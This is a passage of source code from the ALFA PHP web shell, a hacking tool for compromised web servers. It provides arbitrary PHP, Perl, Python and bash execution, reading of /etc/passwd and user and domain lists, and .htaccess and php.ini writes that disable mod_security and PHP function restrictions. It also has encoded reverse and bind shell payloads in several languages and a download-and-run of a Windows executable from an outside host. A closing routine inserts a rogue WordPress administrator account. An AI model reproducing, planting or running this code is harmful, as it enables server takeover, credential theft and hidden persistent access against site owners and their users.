$randname = $basename.rand(111,9999);
$scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);
$filepath = $scriptpath."/".$randname;
if(_alfa_is_writable($scriptpath)){
alfaEx("cp '".addslashes($_POST["file"])."' '".addslashes($filepath)."'");
readfile($filepath);
@unlink($filepath);
}else{
alfaEx("cat '".addslashes($_POST["file"])."'");
}
}else{
readfile($_POST['file']);
}
}else echo('Error...!');}}
function __alfa_set_cookie($key, $value){
$_COOKIE[$key] = $value;
@setcookie($key, $value, time()+(86400 * 7), '/');
}
function alfaphpeval(){
if(isset($_COOKIE["eval_tmpdir"])&&@is_dir($_COOKIE["eval_tmpdir"])){
$tempdir = __ZGVjb2Rlcg($_COOKIE["eval_tmpdir"]);
}else{
$tempdir = dirname(alfaEx("mktemp"));
__alfa_set_cookie("eval_tmpdir", __ZW5jb2Rlcg($tempdir));
}
alfahead();
if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')){
echo '<div class=header>';
ob_start();
$INI=ini_get_all();
print '<table border=0><tr>'
.'<td class="listing"><font class="highlight_txt">Param</td>'
.'<td class="listing"><font class="highlight_txt">Global value</td>'
.'<td class="listing"><font class="highlight_txt">Local Value</td>'
.'<td class="listing"><font class="highlight_txt">Access</td></tr>';
foreach ($INI as $param => $values)
print "\n".'<tr>'
.'<td class="listing"><b>'.$param.'</td>'
.'<td class="listing">'.$values['global_value'].' </td>'
.'<td class="listing">'.$values['local_value'].' </td>'
.'<td class="listing">'.$values['access'].' </td></tr>';
$tmp = ob_get_clean();
$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
echo str_replace('<h1','<h2', $tmp) .'</div><br>';
}
if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) {
echo '<div class=header><style>.p {color:#000;}</style>';
ob_start();
phpinfo();
$tmp = ob_get_clean();
$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
echo str_replace('<h1','<h2', $tmp) .'</div><br>';
}
if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) {
echo '<div class=header>';
ob_start();
$EXT=get_loaded_extensions();
echo '<table border=0><tr><td class="listing">'.implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT).'</td></tr></table>'.count($EXT).' extensions loaded';
echo '</div><br>';
}
$lang_html = "";
foreach(array("php"=>"php ~> [ Windows / Linux ]","perl"=>"perl ~> [ Linux ]","python"=>"python ~> [ Linux ]","bash"=>"bash ~> [ Linux ]") as $key=>$val){$lang_html .= '<option value="'.$key.'" '.($_POST["alfa3"]==$key?"selected":"").'>'.$val.'</option>';}
echo '<div class=header><Center><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form class="php-evals" name="pf" method="post" onsubmit="var ace_value=geEvalAceValue(this);g(\'phpeval\',null,ace_value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">'.$lang_html.'</select>'._alfa_load_ace_options("eval").'<br><br><div class="bigarea" style="position:relative;"><div class="php-evals-ace">'.(!empty($_POST['alfa1'])?htmlspecialchars($_POST['alfa1']):"&lt;?php\n\n\techo('hello alfa !');\n\n?>").'</div></div><center><input type="submit" value="" style="margin-top:5px"></center>';
echo '</form><pre id="PhpOutput" style="'.(empty($_POST['alfa1'])?'display:none;':'').'margin-top:5px;" class="ml1">';
if(!empty($_POST['alfa1'])){
if($_POST['alfa3']=="php"){
ob_start();
eval('?>'.$_POST['alfa1']);
$result = htmlspecialchars(ob_get_clean());
}elseif(_alfa_can_runCommand()&&$GLOBALS["sys"]=="unix"){
$lang = $_POST['alfa3'];
$filename = "temp".rand(11111,99999);
$temp = $tempdir."/".$filename ;
__write_file($filename, $_POST['alfa1']);
$result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");
@unlink($filename);
@unlink($temp);
}
echo '<textarea class="bigarea">'.$result.'</textarea>';
}
echo '</pre></div>';
alfafooter();
}
function __pre(){return('<pre id="strOutput" style="margin-top:5px" class="ml1">');}
function alfaproc()
{
alfahead();
echo "<Div class=header><br><center>";
if(empty($_POST['ajax'])&&!empty($_POST['alfa1']))
$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
if($GLOBALS['sys']=="win"){
$process=array(
"Task List" =>"tasklist /V",
"System Info" =>"systeminfo",
"Active Connections" => "netstat -an",
"Running Services" => "net start",
"User Accounts" => "net user",
"Show Computers" => "net view",
"ARP Table" => "arp -a",
"IP Configuration" => "ipconfig /all"
);}else{
$process=array(
"Process status" => "ps aux",
"Syslog" =>"cat /etc/syslog.conf",
"Resolv" => "cat /etc/resolv.conf",
"Hosts" =>"cat /etc/hosts",
"Cpuinfo"=>"cat /proc/cpuinfo",
"Version"=>"cat /proc/version",
"Sbin"=>"ls -al /usr/sbin",
"Interrupts"=>"cat /proc/interrupts",
"lsattr"=>"lsattr -va",
"Uptime"=>"uptime",
"Fstab" =>"cat /etc/fstab"
);}
foreach($process as $n => $link){
echo '<a href="javascript:void(0);" onclick="g(\'proc\',null,\''.$link.'\')"> | '.$n.' | </a>';
}
echo "</center><br>";
if(!empty($_POST['alfa1'])){
echo "<pre class='ml1' style='margin-top:5px' >";
if($GLOBALS["glob_chdir_false"]&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."';";}
echo alfaEx($cmd.$_POST['alfa1'], true);
echo '</pre>';
}
echo "</div>";
alfafooter();
}
function alfasafe(){
alfahead();
echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>";
echo '<h3><a href=javascript:void(0) onclick="g(\'safe\',null,\'php.ini\',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,\'ini\')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,\'pl\')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,\'passwd\')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,\'users\')">| Read-Users | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,\'valiases\')">| Get-User | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,null,null,\'domains\')">| Get-Domains | </a></center></h3>';
if(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains'){
if(!_alfa_file_exists("/etc/virtual/domainowners")){
echo __pre();
$solevisible9 = _alfa_file('/etc/named.conf');
if(is_array($solevisible9)){
foreach($solevisible9 as $solevisible13){
if(@eregi('zone',$solevisible13)){
preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
if(strlen(trim($solevisible14[1][0])) > 2){
echo $solevisible14[1][0].'<br>';
}}}
}
}else{
echo __pre();
$users = _alfa_file("/etc/virtual/domainowners");
if(is_array($users)){
foreach($users as $boz){
$dom = explode(":",$boz);
echo $dom[0]."\n";}}}}
if(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases'){
echo '
<form onsubmit="g(\'safe\',null,null,null,null,null,null,\'valiases\',this.site.value,null,\'>>\'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>';
if(isset($_POST['alfa9']) && $_POST['alfa9'] == '>>'){
if(!_alfa_file_exists("/etc/virtual/domainowners")){
$site = trim($_POST['alfa7']);
$rep = str_replace(array("https://","http://","www."),"",$site);
$user = "";
if(function_exists("posix_getpwuid") && function_exists("fileowner")){
if($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){
$user = $user['name'];
}
}else{
if(_alfa_can_runCommand(true,true)){
$user = alfaEx("stat -c '%U' /etc/valiases/".$rep);
}
}
if(!empty($user)&&$user!='root'){
echo __pre()."<center><table border='1'><tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">{$user}</font></b></td></tr><tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
}else {echo __pre().'<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>';}
}else{
$site = trim($_POST['alfa7']);
$rep = str_replace(array("https://","http://","www."),"",$site);
$users = _alfa_file("/etc/virtual/domainowners");
foreach($users as $boz){
$ex = explode(":",$boz);
if($ex[0] == $rep){
echo __pre()."<center><table border='1'>
<tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">".trim($ex[1])."</font></b></td></tr>
<tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";break;}}}}}
if(!empty($_POST['alfa5']) && isset($_POST['alfa5'])){
if(!_alfa_file_exists("/etc/virtual/domainowners")){
echo __pre();
$i = 0;
while ($i < 60000) {
$line = @posix_getpwuid($i);
if (!empty($line)) {
while (list ($key, $vl) = each($line)){
echo $vl."\n";
break;}}$i++;}
}else{echo __pre();
$users = _alfa_file("/etc/virtual/domainowners");
foreach($users as $boz){
$user = explode(":",$boz);
echo trim($user[1]).'<br>';}}}
if(!empty($_POST['alfa4']) && isset($_POST['alfa4'])){
echo __pre();
if(_alfa_can_runCommand(true,true)){echo __read_file("/etc/passwd");}elseif(function_exists("posix_getpwuid")){
for($uid=0;$uid<60000;$uid++){
$ara = @posix_getpwuid($uid);
if(!empty($ara)){
while(list ($key, $val) = each($ara)){
echo "$val:";
}echo "\n";}}
}else{__alert('failed...');}}
if(!empty($_POST['alfa2']) && isset($_POST['alfa2'])){
@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<IfModule mod_security.c>\nSec------Engine Off\nSec------ScanPOST Off\n</IfModule>");
echo '<center><b><big>htaccess for Apache created...!</center></b></big>';
}
if(!empty($_POST['alfa1'])&& isset($_POST['alfa1'])){
@__write_file($GLOBALS['cwd']."php.ini","safe_mode=OFF\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)");
echo '<center><b><big> php.ini created...!</center></b></big>';
}
if(!empty($_POST['alfa3']) && isset($_POST['alfa3'])){
@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
echo '<center><b><big>htaccess for Litespeed created...!</center></b></big>';
}
echo "<br></div>";
alfafooter();
}
function __get_resource($content){
return @gzinflate(__ZGVjb2Rlcg($content));
}
function __write_file($file, $content){
if($fh = @fopen($file, "wb")){
if(fwrite($fh, $content)!==false) return true;
}
return false;
}
function bcinit($evalType, $evalCode, $evalOptions, $evalArguments){
$res = "<font color='green'>[ Success...! ]</font>";
$err = "<font color='red'>[ Failed...! ]</font>";
if($evalOptions!="") $evalOptions = $evalOptions." ";
if($evalArguments!="") $evalArguments = " ".$evalArguments;
if($evalType=="c"){
$tmpdir = ALFA_TEMPDIR;
chdir($tmpdir);
if(is_writable($tmpdir)){
$uniq = substr(md5(time()),0,8);
$filename = $evalType.$uniq.".c";
$path = $filename;
if(__write_file($path, $evalCode)){
$ext = ($GLOBALS['sys']=='win')? ".exe":".out";
$pathres = $filename.$ext;
$evalOptions = "-o ".$pathres." ".$evalOptions;
$cmd = "gcc ".$evalOptions.$path;
alfaEx($cmd);
if(is_file($pathres)){
if(chmod($pathres, 0755)){
$cmd = $pathres.$evalArguments;
alfaEx($cmd);
}else{$res = $err;}
unlink($pathres);
}else{$res = $err;}
unlink($path);
}else{$res = $err;}
}
return $res;
}elseif($evalType=="java"){
$tmpdir = ALFA_TEMPDIR;
chdir($tmpdir);
if(is_writable($tmpdir)){
if(preg_match("/class\ ([^{]+){/i",$evalCode, $r)){
$classname = trim($r[1]);
$filename = $classname;
}else{
$uniq = substr(md5(time()),0,8);
$filename = $evalType.$uniq;
$evalCode = "class ".$filename." { ".$evalCode . " } ";
}
$path = $filename.".java";
if(__write_file($path, $evalCode)){
$cmd = "javac ".$evalOptions.$path;
alfaEx($cmd);
$pathres = $filename.".class";
if(is_file($pathres)){
if(chmod($pathres, 0755)){
$cmd = "java ".$filename.$evalArguments;
alfaEx($cmd);
}else{$res = $err;}
unlink($pathres);
}else{$res = $err;}
unlink($path);
}else{$res = $err;}
}
return $res;
}
return false;
}
function alfaconnect(){
alfahead();
$php="7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";
$python="pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";
$perl="lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";
$ruby="tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";
$node="nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";
$c="tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";
$java="lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";
echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>";
echo "<form onSubmit=\"g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;\">
<div class=\"txtfont\">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);' style='width:120px;'><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class=\"txtfont\">Use:</div> <select name='selectCb'>";
$cbArr = array("php"=>"Php","perl"=>"Perl","python"=>"Python","ruby"=>"Ruby","c"=>"C","java"=>"Java","node"=>"NodeJs","bcwin"=>"Windows");
foreach($cbArr as $key=>$val){echo("<option value='{$key}' ".($GLOBALS['sys']=='win'?'selected':'').">{$val}</option>");}
echo "</select> <div id='bcipAction' style='display:inline-block;'><div class=\"txtfont\">IP:</div> <inputtype='text' style='text-align:center;' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'></div> <div class=\"txtfont\">Port: </div> <input type='text' size='5' style='text-align:center;' name='port' value='2012'> <input type='submit' value='>>'></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>";
if(isset($_POST['alfa1'])&&!empty($_POST['alfa1'])){
$lang = $_POST['alfa1'];
$ip = $_POST['alfa2'];
$port = $_POST['alfa3'];
$arg = ($_POST['alfa4']=='bind'?$port:$port.' '.$ip);
$tmpdir = ALFA_TEMPDIR;
$name = $tmpdir.'/'.$lang.uniqid().rand(1,99999);
$allow = array('perl','ruby','python','node');
eval('$lan=$'.$lang.';');
if(in_array($lang,$allow)){
if(__write_file($name,__get_resource($lan))){
if(_alfa_can_runCommand(true,true)){
$os = ($GLOBALS['sys']!='win')?'1>/dev/null 2>&1 &':'';
$out = alfaEx("$lang $name $arg $os");
if($out==''){$out="<font color='green'><center>[ Finished...! ]</center></font>";}
echo("<pre class='ml1' style='margin-top:5px'>{$out}</pre>");
}
}else{
echo("<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>");
}
}
if($lang=='java'||$lang=='c'){
$code = __get_resource($lan);
$out = nl2br(bcinit($lang, $code,'',''));
echo("<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>");
}
if($lang=='bcwin'){
$alfa = new AlfaCURL();
$s = $alfa->Send('http://solevisible.com/bc/windows.exe');
$tmpdir = ALFA_TEMPDIR;
$f = @fopen($tmpdir.'/bcwin.exe','w+');
@fwrite($f, $s);
@fclose($f);
$out = alfaEx($tmpdir."/bcwin.exe ".$_POST['alfa2']." ".$_POST['alfa3']);
}
if($lang=='php'){
echo "<pre class=ml1 style='margin-top:5px'>";
$code = __get_resource($lan);
if($code!==false){
$code = "\$target = \"".$arg."\";\n".$code;
eval($code);
echo("<center><font color='green'>[ Finished...! ]</font></center>");
}
echo "</pre>";
}
}
echo "</div>";
alfafooter();
}
function alfapwchanger(){
alfahead();

echo '<div class=header><center><br><div class="txtfont_header">| Add New Admin |</div>
<center><h3>';
$vals = array('WordPress' => array('wp',2),'Joomla' => array('joomla',3),'vBulletin' => array('vb',5),'phpBB' => array('phpbb',6),'WHMCS' => array('whmcs',7),'MyBB' => array('mybb',8),'Php Nuke' => array('nuke',9),'Drupal' => array('drupal',10),'SMF' => array('smf',11));
Alfa_Create_A_Tag('pwchanger',$vals);
echo '</h3></center>';
if(isset($_POST['alfa1'])&&$_POST['alfa1']=='wp'){

echo __pre().'<center><center><div class="txtfont_header">| WordPress |</div>
<p>'.getConfigHtml('wp').'</p><form onSubmit="g(\'pwchanger\',null,\'wp\',\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host','id'=>'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 'td8' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
);
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form>';
if ($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
$localhost = $_POST['alfa3'];
$database = $_POST['alfa4'];
$username = $_POST['alfa5'];
$password = $_POST['alfa6'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"select ID from ".$prefix."users where user_login='".$admin."'") or die(mysqli_error($conn));
$sole = @mysqli_num_rows($solevisible);
if ($sole == 1){
$solevis = @mysqli_fetch_assoc($solevisible);
$res = $solevis['ID'];
